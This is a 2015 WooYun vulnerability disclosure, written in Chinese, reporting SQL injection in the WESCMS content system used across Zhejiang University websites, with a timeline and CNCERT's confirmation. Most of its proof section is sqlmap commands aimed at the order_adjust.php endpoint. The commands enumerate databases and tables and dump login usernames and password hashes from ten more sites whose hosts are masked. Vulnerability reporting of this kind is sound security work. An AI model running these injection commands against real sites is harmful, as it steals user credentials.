当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134886

漏洞标题:浙江大学多个网站存在通用型SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 慢慢

提交时间:2015-08-22 21:12

修复时间:2015-10-09 10:10

公开时间:2015-10-09 10:10

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-22: 细节已通知厂商并且等待厂商处理中
2015-08-25: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-04: 细节向核心白帽子及相关领域专家公开
2015-09-14: 细节向普通白帽子公开
2015-09-24: 细节向实习白帽子公开
2015-10-09: 细节向公众公开

简要描述:

浙江大学多个网站使用不靠谱的CMS导致SQL注入。

详细说明:

浙江大学多个网站使用不靠谱的CMS导致SQL注入。

漏洞证明:

以浙江大学化学系为例详细说明:

sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dbs


得到结果

available databases [3]:
[*] chem
[*] information_schema
[*] test


选择chem继续深入

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" -D chem --tables


得出结果

Database: chem
[79 tables]
+-------------------------+
| adodbseq                |
| daoshi                  |
| daoshi_fufeipd          |
| daoshi_liushui          |
| member                  |
| member_group            |
| member_profile          |
| poll_config             |
| poll_log                |
| poll_option             |
| poll_poll               |
| sc_arrangement          |
| sc_config               |
| sc_datesector           |
| sc_rooms                |
| tbladvertisement        |
| tblarticle              |
| tblarticle_remark       |
| tblauditflow            |
| tblauditflow_status     |
| tblauditflow_step       |
| tblclass_template       |
| tblcolumns              |
| tblcounter              |
| tblcounter_daily        |
| tblcounter_online       |
| tblcp_class             |
| tblcp_class_field       |
| tblcp_class_relation    |
| tblcp_class_validator   |
| tblcp_constraint        |
| tblcp_constraint_bind   |
| tblcp_datatype          |
| tblcp_datatype_item     |
| tblcp_domain_validator  |
| tblcrons                |
| tblcustom_form          |
| tblcustom_form_bind     |
| tblcustom_form_cc       |
| tblcustom_form_field    |
| tblcustom_form_tab      |
| tblcustomise            |
| tbldashboard            |
| tbldashboard_plugins    |
| tbldistrictprivilege    |
| tblevent                |
| tblgroup                |
| tblguestbook            |
| tblkeywords             |
| tbllink                 |
| tbllogin                |
| tbllogs                 |
| tblobject_attachment    |
| tblobject_counter       |
| tblobject_keywords      |
| tblobject_note          |
| tblobject_propertysheet |
| tblpersistent           |
| tblprivilege            |
| tblprivilege_atoms      |
| tblproc                 |
| tblprofile_fields       |
| tblroom_arrangement     |
| tblroom_datesector      |
| tblroom_login_config    |
| tblroom_rooms           |
| tblseq_cp_class         |
| tblsoft                 |
| tblsubject              |
| tblsubjectarticle       |
| tbluser_preference      |
| tblusergroup            |
| yiqi_customfrom_bind    |
| yiqitimeset             |
| yiqiyy                  |
| yiqiyy_yuyueqrsj        |
| yiqiyy_yuyuesj          |
| youjianmb               |
| yuyue_revise_log        |
+-------------------------+


然后挑选tbllogin进行下一步

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" -T tbllogin -D chem --threads=10 --columns


得出结果

+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| address     | varchar(255) |
| birthday    | int(11)      |
| branch      | varchar(50)  |
| contact     | varchar(50)  |
| customize1  | varchar(255) |
| customize2  | varchar(255) |
| customize3  | varchar(255) |
| customize4  | varchar(255) |
| customize5  | varchar(255) |
| customize6  | text         |
| customize7  | text         |
| descri      | varchar(100) |
| duty        | varchar(200) |
| email       | varchar(50)  |
| gender      | int(11)      |
| id          | int(11)      |
| last_visit  | int(11)      |
| lock_flag   | int(11)      |
| mobile      | varchar(50)  |
| msn         | varchar(50)  |
| name        | varchar(50)  |
| password    | char(32)     |
| qq          | varchar(20)  |
| regdate     | int(11)      |
| tele        | varchar(50)  |
| unit        | varchar(50)  |
| user_type   | int(11)      |
| username    | varchar(50)  |
| visit_count | int(11)      |
| zip         | varchar(30)  |
+-------------+--------------+


然后最后一步

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D chem --threads=10


别人的密码就不写了,上一张截图证明:

1.gif


浙江大学其他网站的漏洞证明:
1. 浙江大学本科生院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D bksy --threads=10


有很多123456

2.gif


2. 浙江大学研究生院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D grs --threads=10


3. 浙江大学人事处

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D hr --threads=10


4. 浙江大学图书馆

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D libweb --threads=10


5. 浙江大学物理系

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D physics --threads=10


6. 浙江大学化学工程与生物学院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D che --threads=10


7. 浙江大学经济学院(没想到经济学院竟然是chem)

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D chem --threads=10


8. 浙江大学城市学院图书馆

python sqlmap.py -u "http://**.**.**.**//wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D lib --threads=10


9. 浙江大学生命科学研究院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D lsi --threads=10


10. 浙江大学电气工程学院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D ee --threads=10


同类型的SQL漏洞在浙江大学的网站中还存在着很多,几乎所有使用了WESCMS的网站都有这个漏洞。

修复方案:

尽量更换CMS,虽然不太可能……

版权声明:转载请注明来源 慢慢@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-25 10:09

厂商回复:


CNVD确认并复现所述 情况,已经转由CNCERT向教育网应急组织赛尔网络公司通报.

最新状态:

暂无